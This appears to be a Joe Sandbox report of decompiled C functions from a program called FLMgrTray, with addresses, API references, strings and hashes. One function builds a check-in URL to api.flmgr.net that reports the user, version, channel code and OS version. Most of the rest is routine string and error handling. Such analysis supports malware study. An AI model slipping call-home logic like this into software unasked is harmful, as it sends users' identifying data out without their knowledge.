                                                                                        				void* _t69;
                                                                                        				void* _t70;
                                                                                        
                                                                                        				_t47 = __ecx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018D928);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t68 = _t67 - 0x38;
                                                                                        				_t27 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t28 = _t27 ^ _t66;
                                                                                        				_v20 = _t28;
                                                                                        				_push(_t28);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t55 = __ecx + 0x78;
                                                                                        				_t45 = _a4;
                                                                                        				if( *((intOrPtr*)(__ecx + 0x8c)) >= 8) {
                                                                                        					_t55 =  *_t55;
                                                                                        				}
                                                                                        				_t30 = _t47 + 0x18;
                                                                                        				if( *((intOrPtr*)(_t47 + 0x2c)) >= 8) {
                                                                                        					_t30 =  *_t30;
                                                                                        				}
                                                                                        				_t64 = _t47 + 0x30;
                                                                                        				if( *((intOrPtr*)(_t47 + 0x44)) >= 8) {
                                                                                        					_t64 =  *_t64;
                                                                                        				}
                                                                                        				_t75 =  *((intOrPtr*)(_t47 + 0x14)) - 8;
                                                                                        				_t61 = _t47;
                                                                                        				if( *((intOrPtr*)(_t47 + 0x14)) >= 8) {
                                                                                        					_t61 =  *_t47;
                                                                                        				}
                                                                                        				E00175480(_t55, _t75,  &_v44, L"http://api.flmgr.net/log/client/stay?User=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=pc_tray&StartMode=%d&OsVer=%s&RunMode=%d", _t61);
                                                                                        				_t69 = _t68 + 0xc;
                                                                                        				_v8 = 0;
                                                                                        				E0016C3D0(_t69,  &_v44);
                                                                                        				E00183C60(_t45, _t75,  &_v68, _t64, _t30, _t45,  *0x19db94, _t55,  *((intOrPtr*)(_t47 + 0xc4)));
                                                                                        				_t56 = _v48;
                                                                                        				_t70 = _t69 + 0x1c;
                                                                                        				if(_t56 >= 0x10) {
                                                                                        					_t54 = _v68;
                                                                                        					_t59 = _t56 + 1;
                                                                                        					_t41 = _t54;
                                                                                        					if(_t59 >= 0x1000) {
                                                                                        						_t54 =  *((intOrPtr*)(_t54 - 4));
                                                                                        						_t59 = _t59 + 0x23;
                                                                                        						if(_t41 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t59);
                                                                                        					E00175733(_t41, _t54);
                                                                                        					_t70 = _t70 + 8;
                                                                                        				}
                                                                                        				_t57 = _v24;
                                                                                        				if(_t57 >= 8) {
                                                                                        					_t53 = _v44;
                                                                                        					_t58 = 2 + _t57 * 2;
                                                                                        					_t38 = _t53;
                                                                                        					if(_t58 >= 0x1000) {
                                                                                        						_t53 =  *((intOrPtr*)(_t53 - 4));
                                                                                        						_t58 = _t58 + 0x23;
                                                                                        						if(_t38 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t58);
                                                                                        					E00175733(_t38, _t53);
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t66);
                                                                                        			}

































                                                                                        0x001733e0
                                                                                        0x001733e3
                                                                                        0x001733e5
                                                                                        0x001733f0
                                                                                        0x001733f1
                                                                                        0x001733f4
                                                                                        0x001733f9
                                                                                        0x001733fb
                                                                                        0x00173401
                                                                                        0x00173405
                                                                                        0x00173412
                                                                                        0x00173415
                                                                                        0x00173418
                                                                                        0x0017341a
                                                                                        0x0017341a
                                                                                        0x00173420
                                                                                        0x00173423
                                                                                        0x00173425
                                                                                        0x00173425
                                                                                        0x0017342b
                                                                                        0x0017342e
                                                                                        0x00173430
                                                                                        0x00173430
                                                                                        0x00173432
                                                                                        0x00173436
                                                                                        0x00173438
                                                                                        0x0017343a
                                                                                        0x0017343a
                                                                                        0x00173456
                                                                                        0x0017345b
                                                                                        0x0017345e
                                                                                        0x0017346b
                                                                                        0x00173474
                                                                                        0x00173479
                                                                                        0x0017347c
                                                                                        0x00173482
                                                                                        0x00173484
                                                                                        0x00173487
                                                                                        0x00173488
                                                                                        0x00173490
                                                                                        0x00173492
                                                                                        0x00173495
                                                                                        0x001734a0
                                                                                        0x001734a2
                                                                                        0x001734a2
                                                                                        0x001734a0
                                                                                        0x001734a8
                                                                                        0x001734aa
                                                                                        0x001734af
                                                                                        0x001734af
                                                                                        0x001734b2
                                                                                        0x001734b8
                                                                                        0x001734ba
                                                                                        0x001734bd
                                                                                        0x001734c4
                                                                                        0x001734cc
                                                                                        0x001734ce
                                                                                        0x001734d1
                                                                                        0x001734dc
                                                                                        0x001734de
                                                                                        0x001734de
                                                                                        0x001734dc
                                                                                        0x001734e4
                                                                                        0x001734e6
                                                                                        0x001734eb
                                                                                        0x001734f1
                                                                                        0x00173509

                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001734A2
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001734DE
                                                                                        Strings
                                                                                        • http://api.flmgr.net/log/client/stay?User=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=pc_tray&StartMode=%d&OsVer=%s&RunMode=%d, xrefs: 00173450
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: http://api.flmgr.net/log/client/stay?User=%s&Ver=%s&ChannelCode=%s&RunTime=%d&Module=pc_tray&StartMode=%d&OsVer=%s&RunMode=%d
                                                                                        • API String ID: 3668304517-3030680080
                                                                                        • Opcode ID: 12aef4497197fc7090b2277ffcac3247ff95fefa581b05e8367040f55949108b
                                                                                        • Instruction ID: c9817a38ea14ec2236d8ed689c6f82612399323095eaaaa621c8951d4bc56456
                                                                                        • Opcode Fuzzy Hash: 12aef4497197fc7090b2277ffcac3247ff95fefa581b05e8367040f55949108b
                                                                                        • Instruction Fuzzy Hash: 7931E632A00144EFDB18DF64DC45EADB77AFB89325F60816DE4199B241D731AA82CBB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 57%
                                                                                        			E00182320(char* _a4, long _a8) {
                                                                                        				void* _v8;
                                                                                        				char _v16;
                                                                                        				char _v20;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				signed int _t25;
                                                                                        				long _t29;
                                                                                        				void* _t33;
                                                                                        				void* _t34;
                                                                                        				char _t40;
                                                                                        				char _t42;
                                                                                        				char* _t44;
                                                                                        				void* _t47;
                                                                                        				signed int _t49;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E308);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_push(_t34);
                                                                                        				_t25 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t25 ^ _t49);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v20 = 0;
                                                                                        				_t29 = FormatMessageA(0x1300, 0, _a8, 0x400,  &_v20, 0, 0);
                                                                                        				_t42 = _v20;
                                                                                        				_t47 = _t42;
                                                                                        				_a8 = _t47;
                                                                                        				_v8 = 0;
                                                                                        				if(_t29 == 0) {
                                                                                        					L10:
                                                                                        					_t44 = _a4;
                                                                                        					_push(0x11);
                                                                                        					_push("asio.system error");
                                                                                        					 *(_t44 + 0x10) = 0;
                                                                                        					 *((intOrPtr*)(_t44 + 0x14)) = 0xf;
                                                                                        					 *_t44 = 0;
                                                                                        				} else {
                                                                                        					if( *((char*)(_t29 + _t42 - 1)) == 0xa) {
                                                                                        						_t29 = _t29 - 1;
                                                                                        						 *((char*)(_t29 + _t42)) = 0;
                                                                                        						_t42 = _v20;
                                                                                        					}
                                                                                        					if(_t29 == 0) {
                                                                                        						goto L10;
                                                                                        					} else {
                                                                                        						if( *((char*)(_t29 + _t42 - 1)) == 0xd) {
                                                                                        							_t29 = _t29 - 1;
                                                                                        							 *((char*)(_t29 + _t42)) = 0;
                                                                                        							_t42 = _v20;
                                                                                        						}
                                                                                        						if(_t29 == 0) {
                                                                                        							goto L10;
                                                                                        						} else {
                                                                                        							_t44 = _a4;
                                                                                        							_t40 = _t42;
                                                                                        							 *(_t44 + 0x10) = 0;
                                                                                        							_t18 = _t40 + 1; // 0x1
                                                                                        							_t34 = _t18;
                                                                                        							 *((intOrPtr*)(_t44 + 0x14)) = 0xf;
                                                                                        							 *_t44 = 0;
                                                                                        							do {
                                                                                        								_t33 =  *_t40;
                                                                                        								_t40 = _t40 + 1;
                                                                                        							} while (_t33 != 0);
                                                                                        							_push(_t40 - _t34);
                                                                                        							_push(_t42);
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				E00163450(_t34, _t42, _t44);
                                                                                        				LocalFree(_t47);
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t44;
                                                                                        			}

















                                                                                        0x00182323
                                                                                        0x00182325
                                                                                        0x00182330
                                                                                        0x00182332
                                                                                        0x00182335
                                                                                        0x0018233c
                                                                                        0x00182340
                                                                                        0x0018234d
                                                                                        0x00182364
                                                                                        0x0018236a
                                                                                        0x0018236d
                                                                                        0x0018236f
                                                                                        0x00182372
                                                                                        0x0018237b
                                                                                        0x001823cd
                                                                                        0x001823cd
                                                                                        0x001823d0
                                                                                        0x001823d2
                                                                                        0x001823d7
                                                                                        0x001823de
                                                                                        0x001823e5
                                                                                        0x0018237d
                                                                                        0x00182382
                                                                                        0x00182384
                                                                                        0x00182385
                                                                                        0x00182389
                                                                                        0x00182389
                                                                                        0x0018238e
                                                                                        0x00000000
                                                                                        0x00182390
                                                                                        0x00182395
                                                                                        0x00182397
                                                                                        0x00182398
                                                                                        0x0018239c
                                                                                        0x0018239c
                                                                                        0x001823a1
                                                                                        0x00000000
                                                                                        0x001823a3
                                                                                        0x001823a3
                                                                                        0x001823a6
                                                                                        0x001823a8
                                                                                        0x001823af
                                                                                        0x001823af
                                                                                        0x001823b2
                                                                                        0x001823b9
                                                                                        0x001823c0
                                                                                        0x001823c0
                                                                                        0x001823c2
                                                                                        0x001823c3
                                                                                        0x001823c9
                                                                                        0x001823ca
                                                                                        0x001823ca
                                                                                        0x001823a1
                                                                                        0x0018238e
                                                                                        0x001823ea
                                                                                        0x001823f0
                                                                                        0x001823fb
                                                                                        0x00182409

                                                                                        APIs
                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000,2C80D730,?,?,?,?,?,0018E308,000000FF), ref: 00182364
                                                                                        • LocalFree.KERNEL32(00000000,asio.system error,00000011,?,?,?,?,?,0018E308,000000FF), ref: 001823F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatFreeLocalMessage
                                                                                        • String ID: asio.system error
                                                                                        • API String ID: 1427518018-3828095645
                                                                                        • Opcode ID: ad7c1e1f1def96ccf1e79c6aee5e60b452e0ce803b245a68c6be6d1ad24593b8
                                                                                        • Instruction ID: ec8d4ea1f7d4a561150dc8230734b9d4b4be35212f74fbff6d97b25a272121a1
                                                                                        • Opcode Fuzzy Hash: ad7c1e1f1def96ccf1e79c6aee5e60b452e0ce803b245a68c6be6d1ad24593b8
                                                                                        • Instruction Fuzzy Hash: 1D31D370604749EFEB21DF15CC44BAABBE8FB09710F148259E8109B6C1D7B9AA04CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 64%
                                                                                        			E00164210(void* __ebx, void* __ecx, void* __edi, void* _a4, int _a8, void* _a12) {
                                                                                        				void* _v0;
                                                                                        				intOrPtr _v8;
                                                                                        				unsigned int _v12;
                                                                                        				int _v16;
                                                                                        				void* _v20;
                                                                                        				void* _v24;
                                                                                        				void* _v28;
                                                                                        				void* _t126;
                                                                                        				unsigned int _t127;
                                                                                        				signed int _t131;
                                                                                        				unsigned int _t132;
                                                                                        				void* _t137;
                                                                                        				void _t157;
                                                                                        				void* _t158;
                                                                                        				void* _t189;
                                                                                        				void _t202;
                                                                                        				int _t207;
                                                                                        				int _t208;
                                                                                        				void* _t218;
                                                                                        				intOrPtr* _t219;
                                                                                        				signed int _t221;
                                                                                        				void* _t222;
                                                                                        				void* _t225;
                                                                                        				void* _t228;
                                                                                        				void _t232;
                                                                                        				void _t233;
                                                                                        				signed int _t235;
                                                                                        				void* _t236;
                                                                                        				void* _t241;
                                                                                        				void* _t244;
                                                                                        				unsigned int _t245;
                                                                                        				void* _t246;
                                                                                        				void* _t250;
                                                                                        				void* _t254;
                                                                                        				int _t255;
                                                                                        				void* _t256;
                                                                                        				void* _t258;
                                                                                        				void* _t259;
                                                                                        				int _t269;
                                                                                        				intOrPtr* _t270;
                                                                                        				void* _t274;
                                                                                        				void* _t276;
                                                                                        				int _t277;
                                                                                        				void* _t279;
                                                                                        				void* _t283;
                                                                                        				void* _t285;
                                                                                        				void* _t288;
                                                                                        				void* _t298;
                                                                                        				void* _t299;
                                                                                        				void* _t300;
                                                                                        
                                                                                        				_t218 = __ecx;
                                                                                        				_push("invalid string position");
                                                                                        				L0017672E();
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				asm("int3");
                                                                                        				_t288 = _t298;
                                                                                        				_t299 = _t298 - 0x10;
                                                                                        				_t207 = _v0;
                                                                                        				_t258 = __ecx;
                                                                                        				_t245 =  *(__ecx + 0x14);
                                                                                        				_t269 =  *(__ecx + 0x10);
                                                                                        				_v24 = _t269;
                                                                                        				_v12 = _t245;
                                                                                        				if(_t207 > _t245 - _t269) {
                                                                                        					if(0x7fffffff - _t269 < _t207) {
                                                                                        						E001631F0(_t245);
                                                                                        						asm("int3");
                                                                                        						_push(_t288);
                                                                                        						_t246 = _v28;
                                                                                        						_t300 = _t299 - 0x10;
                                                                                        						_push(_t207);
                                                                                        						_push(_t269);
                                                                                        						_push(_t258);
                                                                                        						_t259 = _t218;
                                                                                        						_t219 =  *((intOrPtr*)(_t259 + 0x10));
                                                                                        						if(_t219 < _t246) {
                                                                                        							E00164210(_t207, _t219, _t259);
                                                                                        							goto L52;
                                                                                        						} else {
                                                                                        							_t208 = _a12;
                                                                                        							_t126 = _t219 - _t246;
                                                                                        							_v24 = _t126;
                                                                                        							_t269 =  <  ? _t126 : _a4;
                                                                                        							_t127 =  *((intOrPtr*)(_t259 + 0x14));
                                                                                        							_a4 = _t269;
                                                                                        							_v12 = _t127;
                                                                                        							if(_t269 != _t208) {
                                                                                        								_v16 = _v24 - _t269 + 1;
                                                                                        								_t250 = _v0;
                                                                                        								if(_t208 >= _t269) {
                                                                                        									_a12 = _t208;
                                                                                        									_a12 = _a12 - _t269;
                                                                                        									if(_a12 > _t127 - _t219) {
                                                                                        										_t246 = _a12;
                                                                                        										if(0x7fffffff - _t219 < _t246) {
                                                                                        											L52:
                                                                                        											E001631F0(_t246);
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											asm("int3");
                                                                                        											_push(_t269);
                                                                                        											_t270 = _t219;
                                                                                        											 *_t270 = malloc(0x408);
                                                                                        											return _t270;
                                                                                        										} else {
                                                                                        											_t131 = _t219 + _t246;
                                                                                        											_v20 = _t131;
                                                                                        											_t221 = _t131 | 0x0000000f;
                                                                                        											if(_t221 <= 0x7fffffff) {
                                                                                        												_t132 = _v12;
                                                                                        												_a12 = _t132 >> 1;
                                                                                        												_t246 = 0x7fffffff - _a12;
                                                                                        												if(_t132 <= 0x7fffffff) {
                                                                                        													_t222 =  <  ? _a12 + _t132 : _t221;
                                                                                        												} else {
                                                                                        													_t222 = 0x7fffffff;
                                                                                        												}
                                                                                        											} else {
                                                                                        												_t222 = 0x7fffffff;
                                                                                        											}
                                                                                        											_t88 = _t222 + 1; // 0x80000000
                                                                                        											_a12 = _t222;
                                                                                        											_t254 = E00163200(_t246, _t88);
                                                                                        											 *((intOrPtr*)(_t259 + 0x10)) = _v20;
                                                                                        											_t137 = _v0;
                                                                                        											 *((intOrPtr*)(_t259 + 0x14)) = _a12;
                                                                                        											_v24 = _t254;
                                                                                        											_push(_t137);
                                                                                        											_t225 = _t254 + _t137;
                                                                                        											_a12 = _t225;
                                                                                        											_v20 = _t225 + _t208;
                                                                                        											if(_v12 < 0x10) {
                                                                                        												L50:
                                                                                        												memcpy(_t254, _t259, ??);
                                                                                        												memcpy(_a12, _a8, _t208);
                                                                                        												memcpy(_v20, _v0 + _t269 + _t259, _v16);
                                                                                        												 *_t259 = _v24;
                                                                                        												return _t259;
                                                                                        											} else {
                                                                                        												_t274 =  *_t259;
                                                                                        												memcpy(_t254, _t274, ??);
                                                                                        												memcpy(_a12, _a8, _t208);
                                                                                        												_t151 = memcpy(_v20, _v0 + _t274 + _a4, _v16);
                                                                                        												_t300 = _t300 + 0x24;
                                                                                        												_t228 = _v12 + 1;
                                                                                        												if(_t228 < 0x1000) {
                                                                                        													L48:
                                                                                        													_push(_t228);
                                                                                        													E00175733(_t151, _t274);
                                                                                        													 *_t259 = _v24;
                                                                                        													return _t259;
                                                                                        												} else {
                                                                                        													_t254 =  *(_t274 - 4);
                                                                                        													_t228 = _t228 + 0x23;
                                                                                        													_t269 = _t274 - _t254;
                                                                                        													_t151 = _t269 - 4;
                                                                                        													if(_t269 - 4 > 0x1f) {
                                                                                        														__imp___invalid_parameter_noinfo_noreturn();
                                                                                        														goto L50;
                                                                                        													} else {
                                                                                        														_t274 = _t254;
                                                                                        														goto L48;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									} else {
                                                                                        										_a4 = _t259;
                                                                                        										 *((intOrPtr*)(_t259 + 0x10)) = _a12 + _t219;
                                                                                        										_t157 = _t259;
                                                                                        										if(_v12 >= 0x10) {
                                                                                        											_t157 =  *_t259;
                                                                                        											_a4 = _t157;
                                                                                        										}
                                                                                        										_t158 = _t157 + _t250;
                                                                                        										_t255 = _a8;
                                                                                        										_t276 = _t269 + _t158;
                                                                                        										_v0 = _t158;
                                                                                        										_v24 = _t276;
                                                                                        										if(_t255 + _t208 <= _v0 || _t255 > _a4 + _t219) {
                                                                                        											_t277 = _t208;
                                                                                        										} else {
                                                                                        											if(_t276 > _t255) {
                                                                                        												_t277 = _t276 - _t255;
                                                                                        											} else {
                                                                                        												_t277 = 0;
                                                                                        											}
                                                                                        										}
                                                                                        										memmove(_a12 + _v24, _v24, _v16);
                                                                                        										memmove(_v0, _a8, _t277);
                                                                                        										memcpy(_v0 + _t277, _a12 + _t277 + _a8, _t208 - _t277);
                                                                                        										return _t259;
                                                                                        									}
                                                                                        								} else {
                                                                                        									 *((intOrPtr*)(_t259 + 0x10)) = _t219 - _t269 + _t208;
                                                                                        									_t232 = _t259;
                                                                                        									if(_t127 >= 0x10) {
                                                                                        										_t232 =  *_t259;
                                                                                        									}
                                                                                        									_t279 = _t232 + _t250;
                                                                                        									memmove(_t279, _a8, _t208);
                                                                                        									memmove(_t279 + _t208, _a4 + _t279, _v16);
                                                                                        									return _t259;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t233 = _t259;
                                                                                        								if(_t127 >= 0x10) {
                                                                                        									_t233 =  *_t259;
                                                                                        								}
                                                                                        								memmove(_t233 + _t246, _a8, _t208);
                                                                                        								return _t259;
                                                                                        							}
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t235 = _t269 + _t207 | 0x0000000f;
                                                                                        						if(_t235 <= 0x7fffffff) {
                                                                                        							_a4 = _t245 >> 1;
                                                                                        							if(_t245 <= 0x7fffffff - _a4) {
                                                                                        								_t236 =  <  ? _a4 + _t245 : _t235;
                                                                                        							} else {
                                                                                        								_t236 = 0x7fffffff;
                                                                                        							}
                                                                                        						} else {
                                                                                        							_t236 = 0x7fffffff;
                                                                                        						}
                                                                                        						_t14 = _t236 + 1; // 0x80000000
                                                                                        						_a4 = _t236;
                                                                                        						_t189 = E00163200(_t245, _t14);
                                                                                        						_v16 = _t189;
                                                                                        						 *((intOrPtr*)(_t258 + 0x10)) = _t269 + _t207;
                                                                                        						 *((intOrPtr*)(_t258 + 0x14)) = _a4;
                                                                                        						_t241 = _t189 + _t269;
                                                                                        						_a4 = _t241;
                                                                                        						_v12 = _t241 + _t207;
                                                                                        						if(_v8 < 0x10) {
                                                                                        							L17:
                                                                                        							memcpy(_t189, _t258, _t269);
                                                                                        							memset(_a4, _a8, _t207);
                                                                                        							 *_v12 = 0;
                                                                                        							 *_t258 = _v16;
                                                                                        							return _t258;
                                                                                        						} else {
                                                                                        							_t283 =  *_t258;
                                                                                        							memcpy(_t189, _t283, _v20);
                                                                                        							memset(_a4, _a8, _t207);
                                                                                        							_t197 = _v12;
                                                                                        							_t299 = _t299 + 0x18;
                                                                                        							_t244 = _v8 + 1;
                                                                                        							 *_v12 = 0;
                                                                                        							if(_t244 < 0x1000) {
                                                                                        								L15:
                                                                                        								_push(_t244);
                                                                                        								E00175733(_t197, _t283);
                                                                                        								 *_t258 = _v16;
                                                                                        								return _t258;
                                                                                        							} else {
                                                                                        								_t256 =  *(_t283 - 4);
                                                                                        								_t244 = _t244 + 0x23;
                                                                                        								_t269 = _t283 - _t256;
                                                                                        								_t189 = _t269 - 4;
                                                                                        								if(_t189 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        									goto L17;
                                                                                        								} else {
                                                                                        									_t283 = _t256;
                                                                                        									goto L15;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        				} else {
                                                                                        					 *(__ecx + 0x10) = _t269 + _t207;
                                                                                        					_t202 = __ecx;
                                                                                        					if(_t245 >= 0x10) {
                                                                                        						_t202 =  *__ecx;
                                                                                        					}
                                                                                        					_t285 = _t269 + _t202;
                                                                                        					memset(_t285, _a8, _t207);
                                                                                        					 *((char*)(_t285 + _t207)) = 0;
                                                                                        					return _t258;
                                                                                        				}
                                                                                        			}





















































                                                                                        0x00164210
                                                                                        0x00164210
                                                                                        0x00164215
                                                                                        0x0016421a
                                                                                        0x0016421b
                                                                                        0x0016421c
                                                                                        0x0016421d
                                                                                        0x0016421e
                                                                                        0x0016421f
                                                                                        0x00164221
                                                                                        0x00164223
                                                                                        0x00164227
                                                                                        0x0016422c
                                                                                        0x0016422e
                                                                                        0x00164233
                                                                                        0x00164238
                                                                                        0x0016423b
                                                                                        0x00164240
                                                                                        0x0016427a
                                                                                        0x0016437a
                                                                                        0x0016437f
                                                                                        0x00164380
                                                                                        0x00164383
                                                                                        0x00164386
                                                                                        0x00164389
                                                                                        0x0016438a
                                                                                        0x0016438b
                                                                                        0x0016438c
                                                                                        0x0016438e
                                                                                        0x00164393
                                                                                        0x001645e9
                                                                                        0x00000000
                                                                                        0x00164399
                                                                                        0x0016439e
                                                                                        0x001643a1
                                                                                        0x001643a5
                                                                                        0x001643a8
                                                                                        0x001643ab
                                                                                        0x001643ae
                                                                                        0x001643b1
                                                                                        0x001643b6
                                                                                        0x001643e2
                                                                                        0x001643e5
                                                                                        0x001643ea
                                                                                        0x00164429
                                                                                        0x0016442e
                                                                                        0x00164434
                                                                                        0x001644c1
                                                                                        0x001644cd
                                                                                        0x001645ee
                                                                                        0x001645ee
                                                                                        0x001645f3
                                                                                        0x001645f4
                                                                                        0x001645f5
                                                                                        0x001645f6
                                                                                        0x001645f7
                                                                                        0x001645f8
                                                                                        0x001645f9
                                                                                        0x001645fa
                                                                                        0x001645fb
                                                                                        0x001645fc
                                                                                        0x001645fd
                                                                                        0x001645fe
                                                                                        0x001645ff
                                                                                        0x00164600
                                                                                        0x00164606
                                                                                        0x00164611
                                                                                        0x00164616
                                                                                        0x001644d3
                                                                                        0x001644d3
                                                                                        0x001644d8
                                                                                        0x001644db
                                                                                        0x001644e4
                                                                                        0x001644ed
                                                                                        0x001644f4
                                                                                        0x001644fc
                                                                                        0x00164501
                                                                                        0x0016450f
                                                                                        0x00164503
                                                                                        0x00164503
                                                                                        0x00164503
                                                                                        0x001644e6
                                                                                        0x001644e6
                                                                                        0x001644e6
                                                                                        0x00164512
                                                                                        0x00164515
                                                                                        0x00164523
                                                                                        0x00164528
                                                                                        0x0016452b
                                                                                        0x0016452e
                                                                                        0x00164531
                                                                                        0x00164534
                                                                                        0x00164535
                                                                                        0x00164538
                                                                                        0x00164541
                                                                                        0x00164544
                                                                                        0x001645b0
                                                                                        0x001645b2
                                                                                        0x001645be
                                                                                        0x001645d1
                                                                                        0x001645dc
                                                                                        0x001645e6
                                                                                        0x00164546
                                                                                        0x00164546
                                                                                        0x0016454a
                                                                                        0x00164556
                                                                                        0x0016456a
                                                                                        0x00164572
                                                                                        0x00164575
                                                                                        0x0016457c
                                                                                        0x00164590
                                                                                        0x00164590
                                                                                        0x00164592
                                                                                        0x0016459d
                                                                                        0x001645a7
                                                                                        0x0016457e
                                                                                        0x0016457e
                                                                                        0x00164581
                                                                                        0x00164584
                                                                                        0x00164586
                                                                                        0x0016458c
                                                                                        0x001645aa
                                                                                        0x00000000
                                                                                        0x0016458e
                                                                                        0x0016458e
                                                                                        0x00000000
                                                                                        0x0016458e
                                                                                        0x0016458c
                                                                                        0x0016457c
                                                                                        0x00164544
                                                                                        0x0016443a
                                                                                        0x0016443f
                                                                                        0x00164446
                                                                                        0x00164449
                                                                                        0x0016444b
                                                                                        0x0016444d
                                                                                        0x0016444f
                                                                                        0x0016444f
                                                                                        0x00164452
                                                                                        0x00164454
                                                                                        0x00164457
                                                                                        0x00164459
                                                                                        0x0016445c
                                                                                        0x00164465
                                                                                        0x0016447c
                                                                                        0x00164470
                                                                                        0x00164472
                                                                                        0x00164478
                                                                                        0x00164474
                                                                                        0x00164474
                                                                                        0x00164474
                                                                                        0x00164472
                                                                                        0x0016448b
                                                                                        0x00164497
                                                                                        0x001644ae
                                                                                        0x001644be
                                                                                        0x001644be
                                                                                        0x001643ec
                                                                                        0x001643f0
                                                                                        0x001643f3
                                                                                        0x001643f8
                                                                                        0x001643fa
                                                                                        0x001643fa
                                                                                        0x00164400
                                                                                        0x00164404
                                                                                        0x00164416
                                                                                        0x00164426
                                                                                        0x00164426
                                                                                        0x001643b8
                                                                                        0x001643b8
                                                                                        0x001643bd
                                                                                        0x001643bf
                                                                                        0x001643bf
                                                                                        0x001643c9
                                                                                        0x001643d9
                                                                                        0x001643d9
                                                                                        0x001643b6
                                                                                        0x00164280
                                                                                        0x00164283
                                                                                        0x0016428c
                                                                                        0x00164299
                                                                                        0x001642a6
                                                                                        0x001642b6
                                                                                        0x001642a8
                                                                                        0x001642a8
                                                                                        0x001642a8
                                                                                        0x0016428e
                                                                                        0x0016428e
                                                                                        0x0016428e
                                                                                        0x001642b9
                                                                                        0x001642bc
                                                                                        0x001642c2
                                                                                        0x001642ca
                                                                                        0x001642cd
                                                                                        0x001642d3
                                                                                        0x001642dd
                                                                                        0x001642e0
                                                                                        0x001642e9
                                                                                        0x001642ec
                                                                                        0x0016434d
                                                                                        0x00164350
                                                                                        0x0016435c
                                                                                        0x00164367
                                                                                        0x0016436d
                                                                                        0x00164377
                                                                                        0x001642ee
                                                                                        0x001642f1
                                                                                        0x001642f5
                                                                                        0x00164301
                                                                                        0x00164306
                                                                                        0x00164309
                                                                                        0x0016430f
                                                                                        0x00164310
                                                                                        0x00164319
                                                                                        0x0016432d
                                                                                        0x0016432d
                                                                                        0x0016432f
                                                                                        0x0016433a
                                                                                        0x00164344
                                                                                        0x0016431b
                                                                                        0x0016431b
                                                                                        0x0016431e
                                                                                        0x00164321
                                                                                        0x00164323
                                                                                        0x00164329
                                                                                        0x00164347
                                                                                        0x00000000
                                                                                        0x0016432b
                                                                                        0x0016432b
                                                                                        0x00000000
                                                                                        0x0016432b
                                                                                        0x00164329
                                                                                        0x00164319
                                                                                        0x001642ec
                                                                                        0x00164242
                                                                                        0x00164245
                                                                                        0x00164248
                                                                                        0x0016424d
                                                                                        0x0016424f
                                                                                        0x0016424f
                                                                                        0x00164251
                                                                                        0x0016425a
                                                                                        0x00164262
